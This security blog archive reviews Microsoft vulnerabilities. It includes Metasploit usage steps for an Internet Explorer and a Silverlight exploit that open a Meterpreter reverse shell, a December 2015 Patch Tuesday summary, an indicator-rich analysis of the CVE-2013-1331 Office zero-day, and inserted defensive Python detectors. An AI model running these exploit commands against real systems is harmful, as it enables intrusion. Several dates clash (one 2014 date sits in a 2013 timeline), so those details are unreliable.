Tag Archives: Microsoft

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Timeline :

Vulnerability discovered exploited in the wild on 2013-08-23
Microsoft published Microsoft Security Advisory 2887505 on 2014-09-17
Microsoft published a Fix it workaround on 2013-09-17
Metasploit PoC provided on 2013-09-30
Patched by the vendor via MS13-080 on 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currently targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc. were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker can first set up two elements, where the second is the child of the first, and then set up an onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element and one for the child. When setCapture() is called for the child element, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees a 0x54-byte memory block. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference is still kept and passed on to more functions; eventually it arrives in the function MSHTML!CTreeNode::GetInterface and causes a crash (or arbitrary code execution) when this function attempts to use the reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access

Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor on 2013-03-12
PoC provided by Vitaliy Toropov on 2013-10-23
Discovered exploited in Exploit Kits on 2013-11-13
Metasploit PoC provided on 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 below version 5.1.20125.0

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists in the Initialize() method of System.Windows.Browser.ScriptObject, which accesses memory in an unsafe manner. Since it is accessible to untrusted (user-controlled) code, it is possible to dereference arbitrary memory, which easily leads to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 to IE10 on Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid

Microsoft December 2015 Patch Tuesday Review

Microsoft released, on December 8th 2015, during its December 2015 Patch Tuesday, two updated security advisories, one new security advisory and twelve security bulletins. Of the twelve security bulletins, eight have a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801, released in September 2012, has been updated. The security advisory concerns updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10, Internet Explorer 11 and Microsoft Edge. KB3119147 has been released for supported editions of:

  • Internet Explorer 10 on Windows 8, Windows Server 2012, and Windows RT;
  • Internet Explorer 11 on Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10;
  • Microsoft Edge on Windows 10.

The update addresses the vulnerabilities described in Adobe Security bulletin APSB15-32.

Microsoft Security Advisory 3057154

MSA-3057154, released in July 2015, has been updated. The security advisory concerns hardening the scenarios in which Data Encryption Standard (DES) encryption keys are used with accounts, to ensure that domain users, services, and computers that support other encryption types are not vulnerable to credential theft or elevation of privilege attacks. KB3057154 has been released for:

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 R2 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 R2 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT
  • Windows RT 8.1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2 (Server Core installation)
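The advisory above is about accounts that still carry DES Kerberos keys. As an added example (not part of the advisory or of any Microsoft tooling), the script below walks an exported list of account attributes and reports the two ways DES can be enabled on an account: the USE_DES_KEY_ONLY bit of userAccountControl and the DES bits of msDS-SupportedEncryptionTypes. The bit values are the documented Active Directory ones; the accounts are constructed sample data, and an unset msDS-SupportedEncryptionTypes is left unevaluated because the domain default then applies.

```python
"""Flag Active Directory accounts whose Kerberos keys may still be DES.

Constructed sample data, not real directory output; attribute bit values are
the documented AD ones.
"""

USE_DES_KEY_ONLY = 0x200000          # userAccountControl flag

# msDS-SupportedEncryptionTypes bit flags
ENC_TYPES = {
    0x01: "DES-CBC-CRC",
    0x02: "DES-CBC-MD5",
    0x04: "RC4-HMAC",
    0x08: "AES128-CTS-HMAC-SHA1-96",
    0x10: "AES256-CTS-HMAC-SHA1-96",
}
DES_BITS = 0x03
AES_BITS = 0x18


def decode_enc_types(mask):
    """Return the names of the encryption types enabled in a bitmask."""
    return [name for bit, name in sorted(ENC_TYPES.items()) if mask & bit]


def assess(account):
    """Return a list of findings for one account dict.

    Keys: sAMAccountName, userAccountControl (int),
    msDS-SupportedEncryptionTypes (int, or None when the attribute is unset;
    unset means the domain default applies and is not evaluated here).
    """
    findings = []
    uac = account.get("userAccountControl", 0)
    enc = account.get("msDS-SupportedEncryptionTypes")
    if uac & USE_DES_KEY_ONLY:
        findings.append("USE_DES_KEY_ONLY is set: Kerberos keys limited to DES")
    if enc is not None and enc & DES_BITS:
        des = [n for n in decode_enc_types(enc) if n.startswith("DES")]
        findings.append("DES listed in msDS-SupportedEncryptionTypes: " + ", ".join(des))
    if enc is not None and enc and not enc & AES_BITS:
        findings.append("no AES type enabled; only " + ", ".join(decode_enc_types(enc)))
    return findings


def report(accounts):
    """Map each flagged sAMAccountName to its findings (clean accounts omitted)."""
    out = {}
    for acct in accounts:
        found = assess(acct)
        if found:
            out[acct["sAMAccountName"]] = found
    return out


# Constructed sample export (not real directory data)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-legacy", "userAccountControl": 0x10000 | USE_DES_KEY_ONLY,
     "msDS-SupportedEncryptionTypes": 0x03},
    {"sAMAccountName": "svc-rc4", "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": 0x04},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200,
     "msDS-SupportedEncryptionTypes": 0x1C},
    {"sAMAccountName": "WS01$", "userAccountControl": 0x1000,
     "msDS-SupportedEncryptionTypes": None},
]

if __name__ == "__main__":
    for name, findings in report(SAMPLE_ACCOUNTS).items():
        print(name)
        for line in findings:
            print("  -", line)
```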

Microsoft Security Advisory 3123040

MSA-3123040 concerns an SSL/TLS digital certificate for *.xboxlive.com for which the private keys were inadvertently disclosed. The certificate could be used in attempts to perform man-in-the-middle attacks. It cannot be used to issue other certificates, impersonate other domains, or sign code. This issue affects all supported releases of Microsoft Windows. KB2677070 has been released for:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows RT
  • Windows RT 8.1
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows 10
  • Windows 10 Version 1511
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Phone 8
  • Windows Phone 8.1
  • Windows 10 Mobile

MS15-124 Cumulative Security Update for Internet Explorer

MS15-124 security update, classified as Critical and allowing remote code execution, is the fix for 30 privately reported vulnerabilities in Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11. KB3116180 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6083 | 9.3 | No | No | Hui Gao of Palo Alto Networks
CVE-2015-6134 | 9.3 | No | No | SkyLined, working with HP’s Zero Day Initiative
CVE-2015-6135 | 5.0 | No | No | Simon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-6136 | 9.3 | No | No | Simon Zuckerbraun, working with HP’s Zero Day Initiative; an anonymous researcher, working with HP’s Zero Day Initiative; Yuki Chen of Qihoo 360Vulcan Team
CVE-2015-6138 | 4.3 | No | No | None
CVE-2015-6139 | 9.3 | No | No | Michal Bentkowski
CVE-2015-6140 | 9.3 | No | No | Bo Qu of Palo Alto Networks
CVE-2015-6141 | 9.3 | No | No | B6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-6142 | 9.3 | No | No | Simon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-6143 | 9.3 | No | No | None
CVE-2015-6144 | 4.3 | No | No | Masato Kinugawa
CVE-2015-6145 | 9.3 | No | No | Cong Zhang and Yi Jiang, working with Beijing VRV Software Co., LTD.
CVE-2015-6146 | 9.3 | No | No | Bo Qu of Palo Alto Networks
CVE-2015-6147 | 9.3 | No | No | B6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-6148 | 9.3 | No | No | A3F2160DCA1BDE70DA1D99ED267D5DC1EC336192, working with HP’s Zero Day Initiative
CVE-2015-6149 | 9.3 | No | No | B6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-6150 | 9.3 | No | No | B6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-6151 | 9.3 | No | No | Li Kemeng of Baidu Security Team (x-Team), working with HP’s Zero Day Initiative
CVE-2015-6152 | 9.3 | No | No | Moritz Jodeit of Blue Frost Security
CVE-2015-6153 | 9.3 | No | No | Shi Ji (@Puzzor)
CVE-2015-6154 | 9.3 | No | No | ChenDong Li and YunZe Ni of Tencent
CVE-2015-6155 | 9.3 | No | No | Zheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-6156 | 9.3 | No | No | Anonymous contributor, working with VeriSign iDefense Labs
CVE-2015-6157 | 4.3 | No | No | Zheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-6158 | 9.3 | No | No | Zheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-6159 | 9.3 | No | No | Zheng Huang of the Baidu Scloud XTeam
CVE-2015-6160 | 9.3 | No | No | Garage4Hackers, working with HP’s Zero Day Initiative
CVE-2015-6161 | 4.3 | No | No | Rh0
CVE-2015-6162 | 9.3 | No | No | Wenxiang Qian of Tencent QQBrowser
CVE-2015-6164 | 6.8 | No | No | None

MS15-125 Cumulative Security Update for Microsoft Edge

MS15-125 security update, classified as Critical and allowing remote code execution, is the fix for 15 privately reported vulnerabilities in Microsoft Edge on Windows 10. KB3116184 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6139 | 9.3 | No | No | Michal Bentkowski
CVE-2015-6140 | 9.3 | No | No | Bo Qu of Palo Alto Networks
CVE-2015-6142 | 9.3 | No | No | Simon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-6148 | 9.3 | No | No | A3F2160DCA1BDE70DA1D99ED267D5DC1EC336192, working with HP’s Zero Day Initiative
CVE-2015-6151 | 9.3 | No | No | Li Kemeng of Baidu Security Team (x-Team), working with HP’s Zero Day Initiative
CVE-2015-6153 | 9.3 | No | No | Shi Ji (@Puzzor)
CVE-2015-6154 | 9.3 | No | No | ChenDong Li and YunZe Ni of Tencent
CVE-2015-6155 | 9.3 | No | No | Zheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-6158 | 9.3 | No | No | Zheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-6159 | 9.3 | No | No | Zheng Huang of the Baidu Scloud XTeam
CVE-2015-6161 | 4.3 | No | No | Rh0
CVE-2015-6168 | 9.3 | No | No | SkyLined, working with HP’s Zero Day Initiative
CVE-2015-6169 | 4.3 | No | No | None
CVE-2015-6170 | 6.8 | No | No | Mario Heiderich of Cure53
CVE-2015-6176 | 4.3 | No | No | Masato Kinugawa

MS15-126 Cumulative Security Update for JScript and VBScript

MS15-126 security update, classified as Critical and allowing remote code execution, is the fix for 2 privately reported vulnerabilities in the VBScript scripting engine in Microsoft Windows. KB3116178 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6135 | 5.0 | No | No | Simon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-6136 | 9.3 | No | No | Simon Zuckerbraun, working with HP’s Zero Day Initiative; an anonymous researcher, working with HP’s Zero Day Initiative; Yuki Chen of Qihoo 360Vulcan Team

MS15-127 Security Update for Microsoft Windows DNS

MS15-127 security update, classified as Critical and allowing remote code execution, is the fix for 1 privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted requests to a DNS server. KB3100465 has been released to fix the vulnerability below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6125 | 9.3 | No | No | None

MS15-128 Security Update for Microsoft Graphics Component

MS15-128 security update, classified as Critical and allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Windows, .NET Framework, Microsoft Office, Skype for Business, Microsoft Lync, and Silverlight. The vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts. KB3104503 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6106 | 9.3 | No | No | Steven Vittitoe of Google Project Zero
CVE-2015-6107 | 9.3 | No | No | Steven Vittitoe of Google Project Zero
CVE-2015-6108 | 9.3 | No | No | None

MS15-129 Security Update for Silverlight

MS15-129 security update, classified as Critical and allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Silverlight. KB3106614 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6114 | 4.3 | Yes | Yes | None
CVE-2015-6165 | 4.3 | No | No | Marcin 'Icewall' Noga of Cisco Talos
CVE-2015-6166 | 9.3 | No | No | None

CVE-2015-6114 vulnerability details have been disclosed publicly by @_Icewall from the Cisco Talos vulndev team.

MS15-130 Security Update for Microsoft Uniscribe

MS15-130 security update, classified as Critical and allowing remote code execution, is the fix for 1 privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted document or visits an untrusted webpage that contains specially crafted fonts. KB3108670 has been released to fix the vulnerability below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6130 | 9.3 | No | No | Hossein Lotfi, Secunia Research (now part of Flexera Software)

MS15-131 Security Update for Microsoft Office

MS15-131 security update, classified as Critical and allowing remote code execution, is the fix for 6 privately reported vulnerabilities in Microsoft Windows. It is interesting to see that CVE-2015-6124 was privately reported but has been seen exploited in the wild. KB3116111 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6040 | 9.3 | No | No | Steven Vittitoe of Google Project Zero
CVE-2015-6118 | 9.3 | No | No | Kai Lu of Fortinet's FortiGuard Labs
CVE-2015-6122 | 9.3 | No | No | Steven Vittitoe of Google Project Zero
CVE-2015-6124 | 9.3 | No | Yes | None
CVE-2015-6172 | 9.3 | No | No | Haifei Li of Intel Security IPS Research Team
CVE-2015-6177 | 9.3 | No | No | Kai Lu of Fortinet's FortiGuard Labs

MS15-132 Security Update for Microsoft Windows

MS15-132 security update, classified as Important and allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Windows. KB3116162 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6128 | 7.2 | Yes | Yes | Steven Vittitoe of Google Project Zero; Parvez Anwar
CVE-2015-6132 | 7.2 | No | No | None
CVE-2015-6133 | 7.2 | No | No | None

CVE-2015-6128 vulnerability details have been disclosed publicly with a proof of concept.

MS15-133 Security Update for Windows PGM

MS15-133 security update, classified as Important and allowing elevation of privilege, is the fix for 1 privately reported vulnerability in Microsoft Windows. KB3116130 has been released to fix the vulnerability below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6126 | 7.2 | No | No | None

MS15-134 Security Update for Windows Media Center

MS15-134 security update, classified as Important and allowing remote code execution, is the fix for 2 privately reported vulnerabilities in Microsoft Windows. KB3108669 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6127 | 4.3 | Yes | Yes | Francisco Falcon of Core Security
CVE-2015-6131 | 9.3 | Yes | Yes | Zhang YunHai of NSFOCUS Security Team

CVE-2015-6127 vulnerability details have been disclosed publicly with a proof of concept.

CVE-2015-6131 vulnerability details have been disclosed publicly with a proof of concept.

MS15-135 Security Update for Windows Kernel-Mode Drivers

MS15-135 security update, classified as Important and allowing elevation of privilege, is the fix for 4 privately reported vulnerabilities in Microsoft Windows. It is interesting to see that CVE-2015-6175 was publicly reported and has also been seen exploited in the wild. KB3119075 has been released to fix the vulnerabilities below:

CVE | CVSS score | Disclosed | Exploited | Credit
CVE-2015-6171 | 7.2 | No | No | Nils Sommer of bytegeist, working with Google Project Zero
CVE-2015-6173 | 7.2 | No | No | Nils Sommer of bytegeist, working with Google Project Zero
CVE-2015-6174 | 7.2 | No | No | Nils Sommer of bytegeist, working with Google Project Zero
CVE-2015-6175 | 7.2 | Yes | Yes | None

MS13-051 / CVE-2013-1331 What We Know About Microsoft Office Zero Day

The MS13-051 Microsoft Office bulletin was released on Tuesday the 11th, 2013, during the traditional Patch Tuesday. This bulletin fixes one vulnerability, CVE-2013-1331, with a base CVSS score of 9.3, affecting Microsoft Office 2003 and Office for Mac (2011). This vulnerability allows remote code execution and was reported by Andrew Lyons and Neel Mehta of Google Inc.

Microsoft has also released additional information, and it appears that some “bad guys” were using this vulnerability as a zero-day in targeted attacks. The vulnerability relates to how Microsoft Office renders malformed PNG files, leading to a classic stack-based buffer overflow.

Malicious Office documents referenced a malicious PNG file loaded from the Internet and hosted on remote servers. The remote servers used scripts in order to avoid multiple exploitations from the same source. Microsoft believes that the attacks were limited to Indonesia and Malaysia.

Microsoft provided some examples of URLs invoked by the malicious Office document, and some hashes of the malicious Office binary format documents.

  • hXXp://intent.nofrillspace.com/users/web11_focus/4307/space.gif
  • hXXp://intent.nofrillspace.com/users/web11_focus/3807/space.gif
  • hXXp://mister.nofrillspace.com/users/web8_dice/3791/space.gif
  • hXXp://mister.nofrillspace.com/users/web8_dice/4226/space.gif
  • hXXp://www.bridginglinks.com/somebody/4698/space.gif
  • hXXp://www.police28122011.0fees.net/pages/013/space.gif
  • hXXp://zhongguoren.hostoi.com/news/space.gif

Information Gathering on “intent.nofrillspace.com”

Some research turns up a Google-cached Excel document mentioning this domain name on 2011-12-29. The domain name is mentioned as a gateway for malicious activities. The web site is currently down, but the associated IP was 80.93.50.73, hosted in the Russian Federation.

“No Frill Space” is a hosting company offering free web space. According to the Wayback Machine, the company web site was still up on May 28th 2013. No additional information is available.

[Screenshot: cached document mentioning intent.nofrillspace.com]

Information Gathering on “mister.nofrillspace.com”

Some research turns up a Google-cached web page as it appeared on 27 May 2013. Since then, like the previous domain, the web site is no longer available. No additional information is available.

[Screenshot: cached mister.nofrillspace.com web page]

Information Gathering on “www.bridginglinks.com”

Like “No Frill Space”, “BRIDGING LINKS” is a hosting company offering free web space. According to the Wayback Machine, the company web site was still up on May 21st 2013. “www.bridginglinks.com” was hosted on 85.17.143.51, located in the Netherlands.

If we take a look at urlQuery, we can see a submission dating from April 4th 2013 mentioning an interesting URL, “hXXp://www.bridginglinks.com/somebody/4698/vw.php”. As you can see, the path is the same as the path mentioned by Microsoft. “vw.php” could be one of the files used to avoid multiple exploitations from the same source.

Joe Sandbox also references Report 1482, no longer available, which refers to the URL “hXXp://www.bridginglinks.com/somebody/4688/vw.php?i=b95146-8a76c6cb7d84148d95ab5a4921b3839c” and a Word document named “virus_suspected.doc”. The associated MD5 of the document is “714876fdce62371da08c139377f23d76”; it was submitted on March 3rd 2013 with a file size of 113.0 KB.

[Screenshot: sample submission]

With the MD5 we can find a VirusTotal sample. The creation date of this document was February 25th 2013. The title of the document is “VN h?c gì t? v? Philippines ki?n TQ”, which seems to be Vietnamese and could be translated as “VN learn from China’s conditions for Philippines”.

The document title seems to be related to the events at the beginning of this year between China and the Philippines regarding territorial conflicts.

Below is a screenshot of the sample:

[Screenshot: CVE-2013-1331 sample]

@mwtracker also submitted a sample to Cryptam on June 13th 2013.

Update of June 16th 2013

After some further investigation we noticed another Word sample (f85eaad502e51eafeae0430e56899d9b), submitted to VirusTotal on October 28th 2009 and with a creation date of October 26th 2009. A re-submission of this sample is clearly detected as CVE-2013-1331!

Analysis of this sample shows that the document title is “The corruption of Mahathir”, by author “585”. “The corruption of Mahathir” is a reference to Mahathir Mohamad, a Malaysian politician who was the fourth Prime Minister of Malaysia, and the document is an adaptation of a Bangkok Post article reminding people how the country has been damaged by Dr M, UMNO and his cronies.

[Screenshot: “The corruption of Mahathir” sample]

Like the previous sample, this sample references “www.bridginglinks.com” and shows exactly the same patterns.

[Screenshot: space.gif reference in the sample]

Update of June 17th 2013

Microsoft has referenced some hashes of the malicious Office documents. Below is more detailed information on these documents. All of these malicious documents are currently detected only by Avast and Symantec.

35a6bbc6dda6a1b3a1679f166be11154 Office document

The document theme is related to telecommunications and its title is “Telco – XX??2013??????????”, which could be translated as “Telco – XX company in 2013 described the core network building program”. The document was created on Wednesday March 6th 2013 and last saved by “abc”. The document initiates connections to “hXXp://zhongguoren.hostoi.com/news/space.gif”.

[Screenshots: zhongguoren.hostoi.com Office document and its link]

fde37e60cc4be73dada0fb1ad3d5f273 Office document

The document theme is related to Susilo Bambang Yudhoyono, an Indonesian politician and retired Army general officer who has been President of Indonesia since 2004. The document title is “Macam-macam critis terhadap SBY dan gerakan kabinet di situs Gerakan Anti SBY II”, which could be translated as “Various critis against SBY cabinet and movement at the site of the anti SBY II”. The document was created on Monday October 31st 2011 and last saved by “xmuser”. The document initiates connections to “hXXp://mister.nofrillspace.com/users/web8_dice/4226/space.gif”.

[Screenshots: mister.nofrillspace.com Office document and its link]

2f1ab543b38a7ad61d5dbd72eb0524c4 Office document

The document theme is related to Chinese zodiac forecasts for 2011, and the document title is “Forecast for 2011”. The document was created on Monday February 7th 2011 and last saved by “xmuser”. The document initiates connections to “hXXp://intent.nofrillspace.com/users/web11_focus/3807/space.gif”.

[Screenshots: intent.nofrillspace.com Office document and its link]

28e81ca00146165385c8916bf0a61046 Office document

The document theme is Malaysian Telco. The document was created by “PDRM” and last saved by “abc”, and the creation date of the document is Sunday October 14th 2012. The document initiates connections to “hXXp://www.police28122011.0fees.net/pages/013/space.gif”.

[Screenshots: police28122011.0fees.net Office document and its link]

7eb17991ed13960d57ed75c01f6f7fd5 Office document

The document theme is Indoleaks, an Indonesian equivalent of WikiLeaks, and the document title is “Indoleaks, ‘Wikileaksnya’ Indonesia”. The document was created by “3565”, last saved by “xmuser” and created on Sunday January 23rd 2011. The document initiates connections to “hXXp://mister.nofrillspace.com/users/web8_dice/3791/space.gif”.

[Screenshots: second mister.nofrillspace.com Office document and its link]

70511e6e75aa38a4d92cd134caba16ef Office document

The document theme is surveillance devices, with the document title “Top 11 Aerial Surveillance Devices”. The document was last saved by “xmuser” and created on Tuesday January 3rd 2012. The document initiates connections to “hXXp://intent.nofrillspace.com/users/web11_focus/4307/space.gif”.

[Screenshots: second intent.nofrillspace.com Office document and its link]

Conclusions

Below is a recap table of all observed behaviors:

MD5 | Author | Last Saved By | Creation Date | Last Saved Date | Domain | Params
714876fdce62371da08c139377f23d76 | SYSTEM | SYSTEM | 2013-02-24 | 2013-02-24 | www.bridginglinks.com | 95146-555210c567278074917c1d11f25a6221
f85eaad502e51eafeae0430e56899d9b | 585 | - | 2009-11-26 | 2009-11-26 | www.bridginglinks.com | 41977-9c477a3c3bf9724fbd985772f6c50ef0
35a6bbc6dda6a1b3a1679f166be11154 | User | abc | 2013-03-06 | 2013-03-06 | zhongguoren.hostoi.com | 2064-ccca749e1a0e6806503c83048bb643d3
fde37e60cc4be73dada0fb1ad3d5f273 | - | xmuser | 2011-10-31 | 2011-10-31 | mister.nofrillspace.com | 81425-3b068ea3d53786a94aaa715c7692a0a1
2f1ab543b38a7ad61d5dbd72eb0524c4 | - | xmuser | 2011-02-07 | 2011-02-07 | intent.nofrillspace.com | 67575-80f27a85a4383ea2f92e8ba46c728ba3
28e81ca00146165385c8916bf0a61046 | PDRM | abc | 2012-10-14 | 2012-10-14 | www.police28122011.0fees.net | 013-8354f8a7f3c21f58d7dbfa2a943c88b8
7eb17991ed13960d57ed75c01f6f7fd5 | 3565 | xmuser | 2011-01-23 | 2011-01-23 | mister.nofrillspace.com | 66995-83fcb7c8e552c81da5611e93a856a399
70511e6e75aa38a4d92cd134caba16ef | - | xmuser | 2012-01-03 | 2012-01-03 | intent.nofrillspace.com | 84435-81782ff9e4e204717db82d2e43a76f2d
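The documents analyzed above all share one network fingerprint: a request for "space.gif" inside a numbered directory on one of the hosts Microsoft listed, and on the same paths a "vw.php?i=<id>-<32 hex>" gate script. As an added example (not part of the original post), the scanner below looks for both shapes in web proxy logs. The log lines are constructed samples in a generic "timestamp client method url status" layout, which is an assumption about the log format rather than any real proxy's output; the only page-derived values are the domains and the one vw.php URL quoted above.

```python
"""Detect the CVE-2013-1331 beacon pattern in web proxy logs.

Constructed sample log lines; the domains and the vw.php URL come from the
analysis above, everything else is assumed.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Domains from the URLs published by Microsoft (see the list above)
KNOWN_DOMAINS = {
    "intent.nofrillspace.com",
    "mister.nofrillspace.com",
    "www.bridginglinks.com",
    "www.police28122011.0fees.net",
    "zhongguoren.hostoi.com",
}

# /<anything>/<digits>/space.gif  or  /<anything>/<digits>/vw.php
BEACON_PATH = re.compile(r"^/(?:.*/)?(?P<dir>\d+)/(?P<file>space\.gif|vw\.php)$")
# vw.php?i=<id>-<32 hex>, the shape seen in the Joe Sandbox report
VW_PARAM = re.compile(r"^(?P<id>[0-9a-z]+)-(?P<token>[0-9a-f]{32})$")

# Assumed log layout: "<timestamp> <client> <method> <url> <status>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")


def classify(url):
    """Describe the beacon if *url* has the space.gif/vw.php shape, else None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    path_match = BEACON_PATH.match(parts.path)
    if not path_match:
        return None
    hit = {
        "host": host,
        "known_domain": host in KNOWN_DOMAINS,
        "dir": path_match.group("dir"),
        "file": path_match.group("file"),
        "token": None,
    }
    if hit["file"] == "vw.php":
        i_val = parse_qs(parts.query).get("i", [""])[0]
        m = VW_PARAM.match(i_val)
        hit["token"] = m.group("token") if m else None
    return hit


def scan(lines):
    """Return (client, hit) pairs for log lines worth investigating.

    A known domain is always flagged. On an unknown domain only the
    vw.php?i=<id>-<hex> shape is flagged: "<digits>/space.gif" alone is too
    common in ordinary web traffic to alert on by itself.
    """
    results = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        hit = classify(m.group("url"))
        if hit and (hit["known_domain"] or hit["token"]):
            results.append((m.group("client"), hit))
    return results


# Constructed sample log (not real traffic)
SAMPLE_LOG = [
    "2013-06-12T09:14:02Z 10.0.0.21 GET http://intent.nofrillspace.com/users/web11_focus/4307/space.gif 200",
    "2013-06-12T09:14:03Z 10.0.0.21 GET http://www.bridginglinks.com/somebody/4698/vw.php?i=b95146-8a76c6cb7d84148d95ab5a4921b3839c 200",
    "2013-06-12T09:15:10Z 10.0.0.37 GET http://cdn.example.net/img/1234/space.gif 200",
    "2013-06-12T09:16:44Z 10.0.0.37 GET http://www.example.org/index.html 200",
]

if __name__ == "__main__":
    for client, hit in scan(SAMPLE_LOG):
        print(client, hit["host"], hit["dir"], hit["file"], hit["token"])
```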

